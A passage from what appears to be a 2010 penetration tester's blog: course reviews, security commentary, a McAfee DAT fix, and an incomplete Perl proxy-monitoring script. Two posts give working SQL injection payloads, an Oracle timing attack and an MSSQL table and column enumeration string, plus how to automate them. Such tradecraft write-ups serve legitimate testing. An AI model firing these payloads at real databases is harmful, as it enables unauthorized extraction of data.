Finally, I have to thank Infosec Institute. I had some not so great things to say about the first half of their 2 week course. However, the second half of the course was very good. The instructor in the online videos seemed very competent, and was good at getting ideas across. The labs were, for the most part, well done. It did a fairly good job of preparing me for the CEPT cert, but certainly didn't give you all the answers in advance.  Also, the staff at Infosec Institute are great people and very helpful. There were a few complications that arose during the course of ordering, receiving and doing the training. Minh Nguyen and Steve Drabik over there could not have been more helpful in getting these issues sorted out. They were also very patient with the man who kept annoying them every other week ;) . i am already looking at their Expert Penetration Testing: Writing Windows Exploits and their Reverse Engineering classes for the future.  Although I am worried about repeating material, especially since Infosec Institute does come with a rather high price tag. 

My advice to anyone in the industry who is itnerested in developing these skills more, would be to take the "Advanced Ethical Hacking" course and  the CEPT cert. If nothing else, it will be fun.

Tuesday, 21 September 2010

Projects Worthy of Praise: Hackers Unite

It has been a while since i have last posted. I come to bring you news of two different projects. I am very excited about both of these. The first one is one I am actually involved in directly: A Hackerspace in Charlotte North Carolina. This idea sort of got kicked off by one of my coworkers, who started investigating it  after visiting Nullspace Labs in LA. He asked if I was interested, and soon after we began investigating potential spaces.

We had our first meetup last week, and to our surprise 25 people showed up to it. The reaction was astoundingly positive. We have a good assortment of software and hardware hackers. We have developers, pentesters, robotics people etc. Everyone there seemed genuinely committed to the idea. Our next meeting is tonight, although I am going to have to miss this one. So if you live in the greater Charlotte area and are interested in participating, please come check us out.

The other project I wanted to mention is being done by Schuyler Towne. He is attempting to start his own lockpick business, and has used kickstarter to try and raise initial funds. He had a goal of about $6,000, and has so far raised over $68,000. Depending on your donation level you will receive some absolutely fabulous prizes including custom lockpicks, practice locks, templates, and more. If you are at all interested in the sport or science of picking locks, do yourself a favour and get on board with this. It is an amazing deal, and people like this deserve community support anyways. There are only 71 hours left to get onboard as a backer!

Monday, 26 July 2010

Infosec Institute Advanced Ethical Hacking

A while ago I made a post about Infosec Institute's 10 Day Penetration Testing Course . I had some not so great things to say about the first half of the course. I think, in retrospect, the first week would be good for someone just starting out in the field to get their feet wet. There are some things I definitely think I would change, to bring it more in line with that concept, but it's hard for me to judge since I was already outside of that target audience. I have finally had the time to delve into the second week of the training course. This portion of the course focuses on the real meat and potatoes of penetration testing and exploiting. There is still some tool-centric material at the beginning, but the course jumps pretty quickly into the good stuff. It starts covering program memory structure, and how buffer overflows really work. Pretty soon you find yourself writing basic shellcode, and doing memory analysis to perform true exploits.

There are ties back to tools, but mostly in how they can make your life easier. Everything this part f the course covers is done manually before they show you how to use a tool. In my opinion, this is exactly what they should be doing. I do not have an assembly background so some of this is valuable information I have been missing so far. From buffer overflows it moves on to format strings and heap overflows. There are sections on on fuzzing, fault injection and more that I have not gotten to yet. I hope to be finishing up the course in the next few days.

There are some benefits to the online version of this course, such as being able to set your own pace. That being said, I think this particular course would be worth paying the extra money for the classroom experience. These are much more complicated topics than the first week, and if you don't already have experience in assembly and memory structure you may find yourself wanting to ask questions that you will have to answer all on your own. There is nothing wrong with this, of course, but I personally prefer active discussion to simply reading things online.

All in all, my impression of the second half of this training is very different from the first. Anyone who has experience with penetration testing, but wants to delve into the real heart of the subject should take a course like this.

Sunday, 25 July 2010

Moving on and Moving Up

The inevitable has happened. I am leaving my current job, and moving on to a new company. I am very excited about this new opportunity. The company I am going to work for seems like a great place to work. However, this will be the first time my family has moved to a location where we don't know anybody. We will have no friends and no family there. This is the part of this field that isn't so great. Jobs tend to crop up in very specific places, and you have to be ready to pick up and move in order to not lose a great opportunity. It was a hard decision to sacrifice all the personal reasons to stay in favour of all the professional reasons to move. We have family, and friends here that we love very much. We like this area after being here only two years. My children will no longer be able to see their grandparents so often. However I will be moving to a larger, more mature company, in  a great area. The team I will be working with is full of very bright people who take this work very seriously. Even more importantly, the members of my new team know lots of things I don't. I will be working to learn a lot from them, and that is something I am eager to start doing.

Robert Khoo over at Penny Arcade said something in one of their tv episodes, that has stuck with me since. He told a potential employee "To be successful at something, to be like the best of breed at something, means you make sacrifices.I would say nine times out of ten, that means your social life, and that is how you get amazing at something." I think that this is extremely true. Nobody ever got to be the best at something by putting in the same amount of effort as everyone else. You get to be the best by putting in more effort than everyone else, and working as hard as you possibly can. I don't know if I can ever be the best at what I do, but I won't stop trying until I am. I have a long way to go before I can be the next RSnake, lcamtuf, or Tavis Ormandy. The best part of being in this field is that those very people I wish to be better than, will help me along the way. It may not be in a big way, but each of those three people have helped me grow already. Each of them have even taken the time to reply to emails and blogposts.  These are people who will honestly share ideas and knowledge. That, more than anything else, is what makes this field great. So look out guys, one day soon you may be reading a white paper with my name on it. In the meantime I just want to say thank you to all of you, as well as Mark Russinovich over at Microsoft, for taking time out of busy lives to answer a few stupid questions from somebody you've never heard of...yet.

Saturday, 26 June 2010

Tavis Ormandy's Full Disclosure: Just the facts ma'am

Everybody has been talking about Tavis Ormandy's disclosure of a Windows Help Centre Vulnerability. There has been very heated debate going around. In some cases the word debate is a little generous. There has been a lot of name calling, mud slinging, and general ad hominem nonesense. People are trashing Tavis, Microsoft, and even Robert Hansen now. It's gotten a little out of hand. What I have noticed is a lack of real substantiated facts in these arguments. To that end, I have made an effort to contact both involved parties, Tavis Ormandy, and the MSRC. I am hoping that they will be willing to respond with some of the facts surrounding this occurrence., and maybe we'll hear a little bit of tempered truth, instead of everyone's emotionally charged bickering. Of course, the chances that either Tavis or the MSRC will be bothered to respond to me are probably not great, here's hoping.

UPDATE: I have heard back from Mr. Ormandy. He was very polite but has stated that he would prefer to let the issue rest than answer anymore questions. Since I am unable to present his side of the argument, even if I were to hear comment back from Microsoft, I would feel it impossible to present an unbiased view here. therefore I shall just let it drop. Perhaps that is really what we all just need to do. If you think he was right, then silently cheer him on, if you think he was wrong admit that maybe he made a mistake, and move on.

Wednesday, 23 June 2010

Oracle Blind SQL Injection : Timing Based Attack using Heavy Queries

This is a neat little trick my mate and I just learned about while testing an Oracle based application with a blind SQL Injection vector in it. It is not new by any means, nor did we discover it. Check out the defcon presentation that gave us the starting point, here. Conventional wisdom would have you believe that you cannot do timing based blind sqli against oracle, since there's no waitfor delay. What we have done is unioned in a query that, when true initiates a secondary 'heavy' query to the database. What we mean by heavy is that it tries to pull a lot of data, purposely slowing down the response time. Let's take a look at our example:

NULL UNION ALL SELECT SOME_FIELD_1 AS COL1, SOME_FIELD_2 AS COL2,((CASE WHEN EXISTS(SELECT SOME_FIELD_3 FROM SOME_TABLE_2 WHERE 0>(select count(*) from all_users t1, all_users t2,all_users t3,all_users t4) AND 1=1) THEN 'own' ELSE 'pwn' END)) as COL3 FROM SOME_TABLE_1,SOME_TABLE_2 ,DUAL WHERE --
 This shows us a true example which should trigger based on the 1=1. So for this query we will see a noticeable delay over the same query with 1=1 replaced by 1=2. that tells us that a true condition will take much longer to reply now. So all we have to do is replace the simple 1=1/1=2 structure with our own test parameters. This is where you get into inserting your counts,lengths, and ascii(substr portions and slowly and methodically enumerate out every last bit of data in the system. This is a great technique to sue when other Blind Injection techniques fail.

Monday, 7 June 2010

SQL Injection Tip of the Day: Table and Column enumeration in a single row

I will be getting around to putting together a comprehensive cheat sheet for sql injection. In the meantime, I figured I would release bits and pieces that I have found particularly useful. Today I want to talk about getting database schema metadata from Microsoft SQL Server 2005 and 2008(the technique may be slightly different for 2000).

This assumes you already have a sql inejction vector that allows serialisation of queries and union queries, and that the db user has create rights, although it can be modified to use update/insert into existing tables instead. So let's say you have found a sql injection vulnerability, but it will only return one row of results. That makes it an exceptionally arduous task to enumerate all the tables and their columns, one at a time. You can concatenate rows very easily, but you can't use concatenation against columns. This is where arrays come in to save the day. The first step is to inject a string like this:

';CREATE TABLE CT1 (tablenames VARCHAR(8000));DECLARE @tablens varchar(7999); SELECT @tablens=COALESCE(@tablens+';' , '') + name from dbo.sysobjects where xtype='U'; INSERT INTO CT1(tablenames) Select @tablens;--

Remember to encode as needed. This creates a new table called CT1 with a max size varchar as it's only column. It then creates an array called tablens, and selects the entire name column from dbo.sysobjects where the object is a user table. Finally it inserts the array in semicolon delimited format into our newly created table.

Then we just do something silly like:
' UNION Select tablenames,@@rowcount,@@servername,1,2,3,4,5 from CT1;DELETE from CT1;--

This of course returns the results, and clears the table out from behind us. We should now have all of the tablenames in this database. Using that we use the same attack vector, just slightly tweaked:


';DECLARE @tablens varchar(7999); SELECT @tablens=COALESCE(@tablens+',' , '') + name from syscolumns where id=object_id('Table1'); INSERT INTO CT1(tablenames) Select @tablens;--
and
' UNION Select tablenames,@@rowcount,@@servername,1,2,3,4,5 from CT1;DELETE from CT1;--

Now what I did, after making sure it worked, was to create a quick perl script. This perlscript took the list of tablenames, and custom generated the above attack strings for each table and put them into a text file. I then loaded this file into Burp Intruder as a custom payload, and let it run. Burp has enumerated almost all of the tables in a couple of minutes(this db had over 100 tables). Then it's just a matter of dumping all the results somewhere and pouring over it. Using this method, you can go from your proven sql injection vector to a map of the whole database in a very short amount of time.

And as ever, this showcases why Burpsuite Pro is a tester's best tool. How I ever worked without it is a mystery.

Thursday, 27 May 2010

Training courses - Nerd steroids

A few years ago when I was trying to break free of the more mundane trappings of IT, I decided to take some certifications. I began with compTIA and took my Network+ and Security+ exams. Imagine my surprise when these certification exams took me no more than 15 minutes apiece to ACE. They were so easy it became embarrassing to tell people that i had bothered to take them. I have considered many times going for my CCNA and CCSP but never gotten around to it. I am now in the process of taking a 10day course from infosecinstitute. This course is actually comprised of two courses jammed together into a single bootcamp. I am doing the online version of the course, unable to get my company to buy in for the additional costs of actually attending a physical class. these courses are centered around the CEH, CPT, and CEPT certifications. I am not very far into the first week of material and I am starting to get that sinking feeling again.

I don't want to bad mouth infosecinstitute and it's training...at least not yet. However, the entire first day was essential an introduction into using vmware and linux. They do this because they want to be able to cater to people who might not have experience in those areas. My question is, what are such people doing taking courses on pentesting? If you don't know how to set up a VM, or how to kill a process in linux, you've got a long way to before you can be a pentester, and it is going to take a lot longer than two weeks. This is where the steroid analogy comes in. People seem to approach these classes as a quick fix, rather like steroids. "If I take this class, i will learn to be a 1337 h4x0r".

DarkNet has a post about training courses right now too. In it he talks about how the CEH is pathetic(I am inclined to agree so far) and then talks about a few other courses/certs. Frankly speaking, these look much the same as every other one I've looked at. They seem tantalizing at first, then you realize it's the same recap bullshit and you learn nothing new.

 Let's give up on steroids guys, and start thinking about some workout regimens. I want to see training courses out there that say outright "If you don't know what the different kinds of vulnerabilities are, or if you don't know how to find SQL injection, xss etc...don't take this class" Let's have some classes that start with "So you know how to find some vulnerabilities, let's talk about advanced techniques, and things you never thought to try before". Let's talk about how you maximize your extraction from a SQL injection, or what things work in Oracle or in MSSQL, or U2, or Sybase etc. Let's talk about some advanced encoding tricks, and how to pack javascript to get around filters. Let's talk about writing shellcode to try and exploit in a buffer overflow.

I am tired of having to rehash the same crap over and over again. Then I read what things RSnake or someone else is up to. I stop and think "hrm, what are they doing differently than me. What do they do better than me. Why?" I want to see training courses that answer those questions. I want something that says "okay, you're a pentester. now let me show you how the big boys do it"

Anyways, that is my rant for the day. Stay tuned as I am going to be working on putting together a bit of a SQL Injection cheat sheet in the coming weeks. I hope to have something comparable to RSnake's XSS cheat sheet and a lot better than the other ones I've seen.

Monday, 24 May 2010

Pakistan and the cyber-jihad?

Wow, I have been out of touch with current events and have been playing catch up a little. I just read about Pakistan's own ISP PieNet taking down youtube. Apparently there has been a big battle of wills between the Pakistani government and sites like youtube, facebook, and our own beloved blogger.com. Well the Pakistani government mandated that these sites be blocked. So PieNet decided to send out BGP announcements for youtube, redirecting traffic to themselves....brilliant. aside from the stupidity of this approach( as they slammed themselves with all of the youtube traffic and then got cutoff by their upstream provider) this is pretty amazing. I am not aware of anything quite like this incident happening before.

An actual legitimate ISP has blatantly and purposefully launched a denial of service attack on one of the biggest sites on the Internet, over their views on censorship. They are basically committing an act of cyberwarefare in the closest sense that the term can be applied. Cyberwarfare, in my opinion, can't really be a part of true physical conflict. It is exactly this kind of scenario, a war of ideas. Pakistan's policy has become one of attacking the largest and easiest providers of free expression to the masses. A lot of these countries have always censored heavily, and done horrible things to keep the truth hidden. This is the first time i can think of where they do it on a global scale though. What happens if we see this behaviour continue? What are the large scale implications for the internet as a whole? There's some heavy stuff going on here. I will need more time to digest it all. In the meantime, what does everybody else think?

Stored Procedures do not necessarily prevent SQL Injection

It seems that a lot of people think that just because an application uses stored procedures, it's queries must be safe. This absolutely false. Stored Procedures do not inherently add security, as they can be put together as poorly as any dynamically built query. I saw a perfect example of this the other day. An application took inputs, passed them to a stored procedures which then built a sql query by concatenating the inputs with predefined query strings. It then called sp_executesql to execute the dynamic query. The developer obviously had heard that stored procedures were safer than dynamic queries, so they went and made an SP, but they had their SP build a dynamic query. So all they succeeded in doing was pushing the problem back into the database layer instead of the app itself.

So testers and developers, please do not assume that an sp means safe. you still have to properly parameterize your queries and validate input and output. Security and shortcuts do not go together. If you think you may have vulnerable SPs like this, try running a query such as SELECT object_Name(id) FROM syscomments WHERE UPPER(text) LIKE  '%SP_EXECUTESQL%' OR UPPER(text) LIKE  '%EXECUTE%' OR UPPER(text) LIKE  '%EXEC%'
 to try and see where these venerabilities are.

Wednesday, 19 May 2010

Return postage for Mr Zalewski

All due respect to Michal Zalewski. He is, after all, a very smart man. Much smarter than me, I'd wager. That being said, I disagree with some of his recent Zero Day Threat Post blog, Postcards from the anti-virus world . go ahead and read it, if you haven't already. Go ahead, I'll wait for you.....okay done?  The most glaring problem is in the logic fail around the first bullet points. Hey says that most users are not keeping their anti-virus up to date. He then claims this is to the average AV user's advantage because malware writers don't bother to write AV evasion. First of all, this seems a bit specious to me, but let's continue on to the real problem here. In the first sub-point of the second item, he says that malware authours punt their malware so fast and so widespread there will be signature updates for it quickly, and this is good.

So excuse me, Mr Zalewski, but people don't update their AV with the latest signatures, but it's okay because they push out new signatures really fast? These two points of logic can in fact work together, as strange as it seems. The problem is that, in this scenario, the user base that is all good, has been marginalized to a fraction of the total user base. So what is really being said here is not that AV blacklisting methodology works really well, but rather that the fundamental failure of this approach for the majority constitutes a success for a minority of the users. So if you are a home user, who keeps his antivirus up to date you are better off than a home user who doesn't, or a corporation that does or does not.

Now let's talk about the second failure of this thinking. Mr Zalewski is thinking in the immediate. Even if the current trend continues on for N iterative cycles, the AV users do not win. The reason for this is simple: Blacklist methodology is not sustainable where N has grown to a large enough number in relation to the resource capacity of the machine running it. Antivirus has always been a resource hog, and has only gotten worse with time. the reason for this is the escalation factor. The 'bad guys' keep coming up with new malware, new techniques, new exploits etc. So the AV firms come out with new signatures, new heuristics, and new scan engines. With every cycle, the product becomes less manageable from a resource perspective. I have had consultants tell me that 'most major companies' do not run AV products on production servers, because it is too resource intensive.

There is also the manageability of the program itself. Remember that AV is code just like any other program, and not some magical box. It's prone to bugs big and small, like any other code. The more you mess with the code, the more the chance of introducing NEW bugs into it. As the complexity increases so do the odds of deviation from expected behaviour. i'm sure that smarter people than me have expressed this mathematically, but I don't know where such a formula resides. So as the N described above continues to increase so do the odds that we will see something like the Mcafee DAT 5958 bug. This factor alone takes a bite out of the security of an AV solution, because security will constantly be fighting operational needs for resources, and every time we have a bug like DAT 5958 or the Symantec Y2k10 bug, the rest of IT hates AV more.

Now let's get back to the bit about most malware authours not using AV evasion. now, I am not Dancho Danchev  or any other malware researcher. Remember i'm just some schmuck penetration tester. That being said, I find it hard to believe this statement is entirely true. What I would be more inclined to believe is that there are now an abundance of skiddies out there using malware 'kits' to assemble tons of variant malware and distributing it. These people, of course, have no idea how to create evasion techniques and so they don't bother. They just cherry-pick. I would hazard a guess that a lot of the people really spending time on writing their malicious code, spend the time on at least some basic AV evasion.

Whether that's true or not, evasion is somewhat unnecessary. Mr. Zalewski hints at this as well in his article.  He says that they don't bother because people don't update their anti-virus, so they don't worry about signature updates. This is just a demonstration of the utter failing of blacklist methodology. The malware authours don't need to write evasion techniques, because if a signature doesn't exist, and the heuristics won't catch it, what's the point? They can release their code into the wild now, then create a new variant when the AV companies get a sig out. They can play this game for quite a while. Tools like virustotal even give them a running scorecard of how they are doing against all the major players.  Relying on signatures leaves holes you could drive trucks through. Those trucks, by the way, happen to be hauling your private data away to China and Russia.

Now please don't get me wrong here. I am not trying to call foul on the AV companies. At least not in any particular fashion. The thing of it is, if you are an MNC that got hit by a worm that exfiltrated trade secrets, and then F-Secure releases a signature a little later, that doesn't help much. It's rather like someone breaking into your house and stealing all of your stuff. the cops catch the crook, but may not get your stuff back. you don't blame the cop, but you do wish they had caught the guy while he was trying to break in, not after the fact.

As always, discussion and opinions are always welcome here.

Friday, 23 April 2010

NetSparker Community Edition Review

For those of you who do not follow DarkNET , it is a well run blog where they add their perspective on security news and events. They also post a never ending stream of new tools and updates. They area great resource for keeping up to date on the latests toys and tools. They have come through for me once again by introducing me to  Netsparker Community Edition. The last fire and forget web scanner I was enticed to check out in this manner was a horrible flop. It was called Acunetix, perhaps you've heard of it? If you haven't don't bother, it's rubbish.

So as you can imagine I was not expecting great things from Netsparker. However, as I was downloading it I noticed that RSnake had also posted about it. Like many people in my field, I tend to have an ego, but when RSnake speaks, I listen. So I installed the community edition and gave it some quick run through. As expected, many of the best features are turned off in the freebie version, but that's okay. They left enough good stuff in there to whet my appetite(good job marketing guys). So here are the things I noticed right off the bat:

  1. The User Interface is very simple and straight forward. This is usually my first indication of a problem. In my experience, good products in this space tend to have absolutely wretched interfaces. they are tormented things that will try to bend your mind to it's will and subjugate you completely. The interface here is so simple most anyone could walk through setting up a scan. 
  2. The User Interface makes sense. Acunetix is a perfect example of the simplistic but terrible User Interface. It is very simple, but anything but straightforward. Trying to understand how to make it do some of the things you'd like it to do is not an easy task. Netsparker does not suffer these issues. It presents you with almost everything you could possibly need and even more importantly, nothing you don't.
  3. The sucker is FAST. I typically use IBM's Rational Appscan product. While AppScan is a good product, fast is never an adjective I would use to describe it. Netsparker is fast. Now part of why it is so fast is because the test profile is so limited in the community edition. So let's just look at the crawler. A 964 url page took appscan just over an hour to crawl. NetSparker did it in 15 minutes. It then ran all of it's tests in another 20-30 minutes. It may be that we will see these speeds drop dramatically with the full version, due to the expanded test profile.
  4. SQLi right away. One of the apps I tested it on had SQL Injection right on the login page. AppScan had failed to detect it, but manual testing revealed it inside 10 minutes. Netsparker caught it immediately. While this is far from a comprehensive look at it's detection rates, I say bravo to netsparker.
  5. Thoroughness. This is hard to gauge because it is the limited version. It FEELS like it is not very thorough. Part of this is psychological, because it runs so fast. Part of it is because it doesn't find some things because it is the 'community edition'. I can't shake the feeling that it is not being thorough, but I would really have to test the full version to make any honest assessment of this. 
  6. No False positives, sorta. I performed several test scenarios, and it did not really generate false positives. The ambiguous language here is due to what I think is a very neat feature. On one of the test sites I saw a distinction in the results between 'we know there is cross-site scripting' and 'we think there might be'. I appreciate that it is extremely difficult to eliminate false positives, and I think this approach is great.
  7. Testing framework. I have talked about this before, and I will talk about it again. We need to see testing harnesses, not just pas scanners. Once you are done with the scan, in Netsparker, it has tools you can use within the app to attempt to exploit the vulnerabilities. If you find a possible SQLi there is an actual injection tool built into the scanner to allow you to try and exploit it. It has similar tools for LFI and Command Injection. This, to my mind, represents the absolute right direction for these types of products to be heading in.
  8. Pricetag. The community edition is free but limited. They then have two unlocked versions. The standard and enterprise edition. the key difference being the number of sites licensed for. I'm not sure if this means you predefine what sites you are licensed for or what. However, the unlimited Enterprise Edition comes with a pricetag of only $3000, which is extremely reasonable in my opinion. It also makes the product worthwhile even as a second scanner. I am considering recommending we purchase an Enterprise license so that we can have two scanners to see if we catch anything with one that we don't with the other. 
So let me summarize briefly. The Community Edition of Netsparker shows some very significant promise. It would seem to indicate a well thought out and well developed product. However, for professional assessments I would definitely recommend you not try to use the Community Edition.  Without having tested the Enterprise Edition, I won't recommend it out of hand, but at a pricetag of only $3000, it seems like a good idea.

Netsparker Community edition is created by Mavituna Security, and can be downloaded here.

Wednesday, 21 April 2010

Mcafee 5958 Dat issue fix Update

Okay, so in my previous post I recommended copying the svchost.exe binary from the servicepackfiles\i386 directory. While in most cases this should work fine, there is still a possibility of version issues doing this. The better solution(although somewhat more tedious) would be to load the extra.dat file, and then go into the virusscan console, unlock it, and release svchost.exe from the quarantine. This should give you back the exact svchost binary that was removed before. I don't know if there's anyway to script releasing from quarantine, so that makes this somewhat less favourable of a solution from a wide scale deployment standpoint. However, this does guarantee that you'll get the EXACT same binary back that you lost. I've heard that Ford in particular is having an issue due to some special svchost binary they were using in their image. Because the version didn't match when they did the fix, it supposedly preventing the os from booting properly. For most people, either way will work fine, I just have to advise caution. I don't want somebody getting mad at me later because the fix I posted 'didn't work'.

This is another reason why I don't think it'd be a good idea for me to post the binary we created for the fix. It is using the specific svchost binary from our standard image and may not be right for everyone. Thanks to everyone who's been commenting/discussing here. I like seeing people helping each other out.

UPDATE: I thought this went without saying, but I'll make sure I mention it anyways. Please make sure to also add the extra.dat to your epo repositories. At this point, with 5959 out it probably is a moot point, but better safe than sorry.

Mcafee DAT 5958 Fix

As many people are already aware, McAfee released DAT 5958 today. This DAT contained a fault, which caused issues in hosts running Windows XP SP3. The fault led to a false detection of the W32/Wecorl.A worm, which was an MS08-067 based worm. This resulted in McAfee nuking svchost.exe killing all win32 services on the machine. This results in a laundry list of problems. The way to fix machines impacted by this is simple:

1. Boot the machine into safe mode
2. Take the extra.dat file mcafee is providing and load it into c:\program files\common files\mcafee\engine
3. Copy svchost.exe from c:\windows\servicepackfiles\i386\svchost.exe to c:\windows\system32\svchost.exe and c:\windows\system32\dllcache\svchost.exe
4. Reboot

This should remove the faulty signature and replace the damaged svchost from the the servicepack files. This test has been tested and works within our company. We have rolled it into a quick exe package for ease of use.

Tuesday, 9 March 2010

Who can you trust?

So by now, everybody has heard about the whole energizer DUO. Couple that with the news that vodafone shipped out some Android phones with Windows malware loaded on them. If you haven't ehard about this bit yet, I recommend reading here and here . The Zdnet post is especially nice because it include links to posts about other incidents just like this. You just have to ignore the linux vs windows flamewar, which I'm sorry to say I let myself get dragged into the middle of. I think it's a shame that the post devolved into that when there's a serious security concern brewing here. It has nothing to do with OSes are or even software. It has to do with trust.

We spend a lot of time talking about trust in the security world. "Don't download software from an untrusted source", "don't open emails from people you don't trust", "Don't plug untrusted usb devices into your computer." Then we get very condescending when people fail to obey these simple tenants of trust. What do we do when the trust betrays us though. These two most recent examples show cases where the users had every right to trust the infection vector. They downloaded software directly from energizer's site, why wouldn't it be safe? I just bought this phone, it's brand new. How could it possibly have malware on it? The phone example would be exactly the same as if you went to a store like staples, bought a thumb drive. Opened that horrid plastic bubble packaging, insert it in your computer, and then your antivirus starts setting off alarms like a 1940's air raid siren. The device was brand new, had not been tampered with in the store as far as you could tell, and came from a trusted source.

So now what if we take our hypothetical situation one step further. What if the malware isn't recognized by your AV. Now we have an infected computer. Your friend brings his usb drive over a couple days later to copy some files. It's his usb drive, he knows where it's been. He knows your a smart guy, so your computer should be safe. He takes the infected drive home, and now infects his machine. The cycle is obvious of course. Yes, of course these hypothetical people should have autorun turned off, we all know that by now, and so this example is not perfect. The issue is the trust factor though. In these situations, there is no "blame it on the user". They had every reason to trust these sources. It seems like the only answer is "don't trust anyone or anything". I'd love to see people's thoughts on this.

Monday, 8 March 2010

This is just sad

So I was taking a poke at a friend's server, doing a preliminary sweep for them. I noticed that they were running filezilla 0.9.33 and so I did a quick google search for "filezilla 0.9.33 vuln". What I came up with scared me a little bit. It wasn't that I found some huge gaping vulnerability, but rather a level of ignorance from one of filezilla's forum admins that was simply astounding. Yuo can see the forum thread here , and find the CVE for the vulnerability being discussed here. The vulnerability that is being discussed is an information disclosure with the getcwd() function.

The site admin, botg, replies "What is FTP getcwd()? There's no such thing". Botg seems to think that this posting is about misuse of an ftp protocol command. He is then presented, by another user, with the CVE for this vulnerability. He then replies "Thank you, I know how to use Google. Doesn't change the fact that there's no such thing as FTP getcwd(), whatever that means". This is the statement, that more than anything else, blows me away.

In the scan results the original user posted it says
Details: The FTP daemon exhibits a descriptor leak in the getcwd (get current working directory) function.
Extra info: None.
Fix: Upgrade your libc C library to the current version.
And in botg's reply, he even includes the function brackets when referring to getcwd. Funny botg, that sure looks like a programming function call, now doesn't it? His snarky reply even sews the seeds of his own demise. "I know how to use google". Oh really? Let me help you out . As the first link describes the C function getcwd() I would say you seem to have some problems using google after all. I would also say, that you obviously have no understanding of how software vulnerabilities happen. If you think that vulnerabilities happen by some command the user can just type in and "hack the gibson", you need to stop watching TV mate. "It's not my job to know these things" you might say. No, but you are in the position of helping users, and this one came to you with a question. Rather than doing any decent amount of research, you opened your mouth and inserted your foot. Let's forget the whole Google bit, or the fact that it is immediately obvious that this is a C function call. I once again point you to the scan results the user posted:

Fix: Upgrade your libc C library to the current version.

Hrm, I wonder if that might provide a clue as to what's going on here? If this is the level of support a filezilla user can expect, I feel very sorry for them.

Update: I decided to register for their forums, so i could post some useful advice to this thread. I would take the high road, instead of just sitting back and being snarky myself. Imagine my surprise when my confirmation email comes in to activate my account, and my username and password are both on it in plaintext...uggggg. These people make me want to cry!

Friday, 5 March 2010

Monitoring those NTLM authentication Proxies

So, now that we have discussed how to overcome the challenge of testing those NTLM proxies, we move on to a better use. Load testing is fine and good, but how often do you really need to load test. Let's say though, that you have a couple dozen of these proxies spread out all over the globe, and for some reason MOM just doesn't cut it with monitoring the actual request performance on these proxies.

Using the base design of the previous script, I created one that is set to test each proxy in the environment once, through the same URL, and measure the delay in response. This is not 100% accurate as internal networking issues can cause some unaccounted fluctuation, but it is good enough for general purposes. So I created a mysql database with two tables. One is a status table, which contains the proxy, a counter, and the current known status. This is especially useful as the script pulls the proxies to test from this table, so adding or removing proxies is just a matter of doing it in the database, instead of altering code. the other table is a simple log file.

The script times the delay in the final response from the initiation of the request and then assigns a status based on this result. It compares it to the current status listed for that proxy, if it is different, it updates the table and emails out an alert. If it continues in a persistent bad state, it will send out a new alert again on the 12 straight return of that bad status. This ensures we are notified that the status is persisting, but doesn't flood us every 10 minutes, which is how frequently the script runs. Anyways, without further ado, here is my simplistic little proxy monitoring script

----------------code--------------------

#!/usr/bin/perl -w
use threads;
use DBI;
use LWP;
use LWP::UserAgent;
use HTTP::Request;
use Authen::NTLM(nt_hash, lm_hash);
use Authen::NTLM::HTTP;
use Time::HiRes qw( gettimeofday );
use Math::Round;
use Net::SMTP;

#Opens the connection to the datbase and prepares the statement handles we will need to call on.
our $dbh = DBI->connect("DBI:mysql:Proxy_Health", , ) or die "Unable to connect to database $DBI::errstr";
our $statuschk = $dbh->prepare("SELECT * from status WHERE proxy=?");
our $statusupd = $dbh->prepare("UPDATE status SET status=? , count=? where proxy=?");
our $logsth=$dbh->prepare("INSERT INTO chklog(proxy,delay) VALUES(?,?)");

#pulls the lsit of proxies from the datbase and maps them to a hash
%proxies= map {$_ => 0 } @{ $dbh->selectcol_arrayref("Select proxy from status" )};

#generates a worker thread for each proxy to test
 my $threadcount = 0;
 foreach (keys %proxies){
$threadcount+=1;
$thrs[$threadcount]= threads->create(\&Test, $_);

}
#performs blcoking for the threads, and returns the result of each test and inserts them into the chklog table
 foreach (keys %proxies){
$proxies{$_}= $thrs[$threadcount]->join;
$proxy_human = $_ ;
$proxy_human=~s/http:\/\///;
$proxy_human=~s/:80//;
$logsth->execute($proxy_human, $proxies{$_});
$threadcount-=1;
}

#Takes the results, and comapres the current status of the proxy to the last recorded status of the proxy. If the status has changed, it updates the status table and sends an alert. If the status has remained the same but is in a negative state, it increments a counter. Every 12 checks that return that negative result will generate a new Alert.
foreach (keys %proxies){
my $scount = 0;
if ($proxies{$_}>= 120){ $status = 'DOWN';}
elsif ($proxies{$_}>= 90){ $status = 'CRITICAL';}
elsif ($proxies{$_}>= 60){ $status = 'MAJOR';}
elsif ($proxies{$_}>= 40){ $status = 'MINOR';}
elsif ($proxies{$_}>= 20){ $status = 'SLOW';}
else{$status = 'GOOD';}
$statuschk->execute($_);
my @statusline = $statuschk->fetchrow_array;

if ($status eq $statusline[1]){
if ($status eq'GOOD'){last;}
elsif ($statusline[2]==11){
$scount =1;
&Alert($_, $status);
print "ALERT $_ !\n";
}
else{
$scount= $statusline[2] +1;
}
if ($scount==1){
&Alert($_, $status);
print "ALERT $_ !\n";
}
$statusupd->execute($status,$scount,$_);
}
else{
if ($status eq'GOOD'){$scount=0;}
else{$scount=1;}
$statusupd->execute($status,$scount,$_);
&Alert($_, $status);
print "ALERT $_ !\n";
}
}

 #

 #This function is what the worker threads run to test their given proxy.
sub Test{
#pulls the proxy from the passed parameters, sets the target as maps.google.com because that site is set to 'private' meaning the proxy will not cache it. It then retrieves the hostname of the local machine and the login credentials, so that it can properly negotiate NTLM authentication with the proxy server
my $proxy=$_[0];
my $url="http://maps.google.com";
our $workstation = `hostname` ;
my $user=;
my $my_pass = ;

#instanatiates the LWP user agent , sets the proxy, and sets the timeout to 120 seconds, because this is the timeout used on our ISA installs
my $ua =  new LWP::UserAgent(keep_alive=>1);
$ua->proxy('http', $proxy);
$ua->timeout(120);

#Creates the first request for the target website, starts the counter running and then fires off the request
my $req = HTTP::Request->new(GET => $url);
my $start = gettimeofday();
my $res = $ua->request($req);


#Sets up the data about the client to send the NTLM Authentication Negotiation Message
$client = new_client Authen::NTLM::HTTP(lm_hash($my_pass), nt_hash($my_pass),Authen::NTLM::HTTP::NTLMSSP_HTTP_PROXY, $user, , , $workstation, );

$flags = Authen::NTLM::NTLMSSP_NEGOTIATE_ALWAYS_SIGN | Authen::NTLM::NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED | Authen::NTLM::NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED | Authen::NTLM::NTLMSSP_NEGOTIATE_NTLM | Authen::NTLM::NTLMSSP_NEGOTIATE_OEM ;
$negotiate_msg = $client->http_negotiate($flags);

#Takes the negotiation message and sets it as a header in the request and resends the request
